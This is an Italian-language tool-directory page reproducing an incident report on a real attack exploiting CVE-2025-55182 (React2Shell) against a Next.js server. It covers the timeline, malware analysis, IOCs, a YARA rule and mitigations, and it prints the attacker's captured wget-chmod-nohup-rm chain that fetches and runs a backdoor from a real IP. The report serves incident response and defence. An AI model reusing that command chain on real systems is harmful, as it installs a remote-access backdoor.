Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-Attack-Analysis — Analisi di attacchi reali di CVE-2025-55182 (React2Shell) - Vulnerabilità RCE nei React Server Components | Kitploit
Strumenti/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
Gestione degli Indicatori di Compromissione (IOC)Analisi delle VulnerabilitàInformatica ForenseSicurezza WebAnalisi MalwareThreat IntelligenceApprendimento e FormazioneRisposta agli Incidenti

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

Analisi di attacchi reali di CVE-2025-55182 (React2Shell) - Vulnerabilità RCE nei React Server Components

Vedi Repository
8 mesi faNon ancora revisionato

CVE-2025-55182 Analisi dell'Attacco: RCE nei React Server Components

Analisi di un attacco reale su un'applicazione Next.js in produzione

📋 Indice

  • Sommario Esecutivo
  • Panoramica della Vulnerabilità
  • Cronologia dell'Attacco
  • Analisi Tecnica
  • Analisi del Malware
  • Indicatori di Compromissione (IOC)
  • Mitigazione e Risposta
  • Lezioni Apprese
  • Riferimenti

Sommario Esecutivo

Il 5 dicembre 2025, la nostra applicazione Next.js in produzione è stata presa di mira da aggressori che sfruttavano CVE-2025-55182 (React2Shell), una vulnerabilità critica di Remote Code Execution nei React Server Components. L'attacco ha tentato di scaricare ed eseguire un trojan backdoor Linux sul nostro server.

AttributoValore
ID CVECVE-2025-55182
Punteggio CVSS9.8 (Critico)
Data dell'Attacco5 dicembre 2025
Esito dell'Attacco✅ Bloccato (post-patch)
Tipo di MalwareTrojan Backdoor Linux
Stack CoinvoltoNext.js + React Server Components

Panoramica della Vulnerabilità

Cos'è CVE-2025-55182?

CVE-2025-55182, nota anche come "React2Shell", è una vulnerabilità critica di Remote Code Execution (RCE) che colpisce i React Server Components (RSC) in:

  • React: versioni 19.0.0 - 19.2.1
  • Next.js: versioni 15.x e 16.x (prima delle patch)

Causa Principale

La vulnerabilità risiede nella funzione renderToReadableStream() all'interno del Flight Server di React. Quando elabora payload RSC appositamente predisposti, il server non riesce a sanificare correttamente determinati input, portando all'esecuzione arbitraria di codice.

Vettore d'Attacco

root@kitploit:~
Attaccante → Payload RSC malevolo → Flight Server → eval() → RCE

L'attaccante invia una richiesta POST costruita con un payload serializzato malevolo che viene deserializzato ed eseguito sul server.


Cronologia dell'Attacco

Fase 1: Tentativi Iniziali di Sfruttamento (Pre-Patch)

Timestamp (UTC)Evento
5 dic, 06:20Primo attacco rilevato tramite Sentry
5 dic, 06:20Il payload tenta di eseguire comandi shell
5 dic, 06:20Attacco parzialmente riuscito (pre-patch)

Log Errore Sentry (Pre-Patch):

root@kitploit:~
Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

Fase 2: Distribuzione della Patch

TimestampAzione
4 dic, 14:13Aggiornato a Next.js 16.0.7
4 dic, 14:13Distribuita versione con patch (v1.0.0-beta-4)

Fase 3: Attacco Bloccato Post-Patch

Timestamp (UTC)Evento
5 dic, 08:48Tentativo di attacco rilevato
5 dic, 08:48Esecuzione del payload BLOCCATA
5 dic, 08:48Errore: syntax error: unexpected ";"

Log Errore Sentry (Post-Patch):

root@kitploit:~
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

La patch ha impedito con successo l'esecuzione del comando malevolo.


Analisi Tecnica

Dettagli della Richiesta di Attacco

AttributoValore
URL di Destinazionehttps://[REDATTO]/

Analisi del Payload

L'attaccante ha tentato di eseguire la seguente catena di comandi:

root@kitploit:~
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

Scomposizione:

Ambiente del Server

ComponenteVersione
SOAlpine Linux 3.23.0
RuntimeNode.js v20.19.6
FrameworkNext.js 16.0.7 (con patch)

Analisi del Malware

Informazioni sul File

Risultati VirusTotal

Tasso di Rilevamento: 13/72 (18%)

Link VirusTotal: Visualizza Analisi

Analisi del Binario

Intestazione ELF:

root@kitploit:~
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

Capacità Identificate:

Stringhe Estratte (Rilevanti):

root@kitploit:~
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

Regole IDS Attivate

SeveritàRegolaFonte
BASSAET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
BASSAET DNS Query for .cc TLDProofpoint ET Open

Classificazione del Malware

Tipo: Trojan Backdoor Linux

Capacità:

  • Accesso remoto alla shell
  • Comunicazione Command & Control (C2)
  • Upload/download di file
  • Comunicazioni crittografate
  • Tunneling del traffico tramite SOCKS5
  • Meccanismi di persistenza

Indicatori di Compromissione (IOC)

IOC di Rete

IOC File

IOC Comportamentali

Regola YARA

root@kitploit:~
rule CVE_2025_55182_Backdoor {
    meta:
        description = "Rileva backdoor distribuita tramite CVE-2025-55182"
        author = "Ricercatore di Sicurezza"
        date = "2025-12-05"
        hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
    
    strings:
        $elf = { 7F 45 4C 46 }
        $go1 = "vendor/golang.org/x/crypto" ascii
        $go2 = "vendor/golang.org/x/net" ascii
        $net1 = "net/http" ascii
        $net2 = "socks5" ascii
        $crypto1 = "crypto/tls" ascii
        $crypto2 = "chacha20poly1305" ascii
    
    condition:
        $elf at 0 and
        (2 of ($go*)) and
        (1 of ($net*)) and
        (1 of ($crypto*))
}

Mitigazione e Risposta

Azioni Immediatamente Intraprese

Rapporto di Abuso

Un rapporto di abuso è stato inviato a Vultr (il provider di hosting del server C2) il 5 dicembre 2025 contenente:

  • Indirizzo IP e URL malevoli
  • Hash SHA256 del malware
  • Link all'analisi VirusTotal
  • Descrizione del vettore d'attacco (CVE-2025-55182)

Versioni Patchate

PacchettoVulnerabilePatchato
Next.js< 15.3.3, < 16.0.5≥ 15.3.3, ≥ 16.0.5
React19.0.0 - 19.1.0≥ 19.2.1 (Giugno 2025+)

Mitigazioni Raccomandate

1. Aggiornare immediatamente:

root@kitploit:~
# Per Next.js 16.x
npm install [email protected] [email protected] [email protected]

# Per Next.js 15.x
npm install [email protected] [email protected] [email protected]

2. Bloccare IP malevolo:

root@kitploit:~
# iptables
sudo iptables -A INPUT -s 45.76.155.14 -j DROP
sudo iptables -A OUTPUT -d 45.76.155.14 -j DROP

# UFW
sudo ufw deny from 45.76.155.14
sudo ufw deny to 45.76.155.14

3. Monitorare gli IOC:

root@kitploit:~
# Cercare file sospetti
find /tmp -type f -executable 2>/dev/null

# Cercare processi sospetti
ps aux | grep -E "(vim|/tmp/)"

# Controllare connessioni di rete
netstat -an | grep "45.76.155.14"

4. Ruotare tutti i segreti:

  • Credenziali del database
  • Segreti JWT
  • Chiavi API
  • Segreti di sessione

Lezioni Apprese

Cosa è Andato Bene

  1. Il monitoraggio Sentry ha rilevato immediatamente l'attacco
  2. Rapida distribuzione della patch entro ore dalla divulgazione della CVE
  3. La containerizzazione Docker ha limitato il raggio d'esplosione
  4. La protezione post-patch ha bloccato con successo gli attacchi successivi

Cosa Potrebbe Essere Migliorato

  1. Patch più rapide - Ridurre il tempo tra divulgazione della CVE e applicazione della patch
  2. Regole WAF - Aggiungere regole per rilevare tentativi di sfruttamento degli RSC
  3. Filtraggio del traffico in uscita - Bloccare connessioni esterne verso IP sconosciuti
  4. Avvisi automatizzati - Impostare avvisi per comandi shell sospetti

Raccomandazioni di Sicurezza


Riferimenti

Avvisi Ufficiali

  • Avviso di Sicurezza Next.js
  • Aggiornamenti di Sicurezza React
  • Dettagli CVE-2025-55182

Risorse di Analisi

  • Analisi VirusTotal
  • MalwareBazaar

Strumenti Utilizzati

  • Sentry - Monitoraggio errori
  • VirusTotal - Analisi malware
  • Docker - Containerizzazione

Disclaimer

Questo report è pubblicato a scopo educativo e difensivo. Il binario del malware non è incluso in questo repository. I ricercatori di sicurezza possono ottenere il campione tramite VirusTotal utilizzando l'hash SHA256 fornito.


Autore

Pubblicato: 5 dicembre 2025

Contatto: [Le tue informazioni di contatto o profilo GitHub]


Licenza

Questa analisi è rilasciata sotto CC BY 4.0. Sei libero di condividere e adattare questo materiale con la dovuta attribuzione.


Changelog

DataVersioneModifiche
2025-12-051.0Pubblicazione iniziale
Scarica lo strumento
MetodoPOST
User-AgentPython Requests 2.31
OrigineScript di attacco automatizzato
PassoComandoScopo
1wget http://45.76.155.14/vim -O /tmp/vimScaricare il malware
2chmod +x /tmp/vimRenderlo eseguibile
3nohup /tmp/vim > /dev/null 2>&1 &Eseguire in background, persistenza dopo il logout
4rm -f /tmp/vimEliminare le prove
ContenitoreDocker
AttributoValore
Nome Filevim (mascherato da strumento legittimo)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
Tipo FileELF 64-bit LSB eseguibile, x86-64
LinguaggioGo (binario compilato)
Dimensione File~4.7 MB
VendorNome Rilevamento
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292
CapacitàEvidenza
Client HTTP/HTTPSnet/http, *http.Client
Crittografia TLScrypto/tls, crypto/aes
Proxy SOCKS5socks, socks5
Risoluzione DNSnet/dns/dnsmessage
Crittografia Fortechacha20poly1305, Ed25519
TipoValoreDescrizione
Indirizzo IP45.76.155.14Server di distribuzione malware
URLhttp://45.76.155.14/vimURL di download malware
HostingVultr VPSProvider cloud
TLD.ccDominio C2 utilizza TLD .cc
TipoValore
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Calcolare se necessario]
MD5[Calcolare se necessario]
Nome Filevim (mascherato)
Tipo FileELF 64-bit x86-64
Dimensione File~4.7 MB
IndicatoreDescrizione
wget verso IP esternoDownload da URL non standard
File in /tmp/Eseguibile sospetto nella directory temporanea
nohup + esecuzione in backgroundTentativo di persistenza
Cancellazione immediata del filePulizia delle prove
User-Agent Python RequestsStrumento di attacco automatizzato
AzioneStatoDettagli
✅ Aggiornamento Next.jsCompletato16.0.4 → 16.0.7
✅ Aggiornamento ReactCompletato19.1.0 → 19.2.1 (patchato)
✅ Ridistribuzione applicazioneCompletatoRicostruzione Docker
✅ Analisi malwareCompletatoInvio a VirusTotal
✅ Segnalazione all'hostingCompletatoInviato rapporto abuso Vultr
⏳ Rotazione credenzialiIn sospesoDatabase, JWT, chiavi API
CategoriaRaccomandazione
MonitoraggioImplementare monitoraggio degli errori in tempo reale (Sentry, ecc.)
AggiornamentiIscriversi agli avvisi di sicurezza per tutte le dipendenze
ReteImplementare filtraggio del traffico in uscita, bloccare connessioni non necessarie
ContenitoriEseguire come non-root, utilizzare filesystem in sola lettura
SegretiRuotare regolarmente le credenziali, utilizzare un gestore di segreti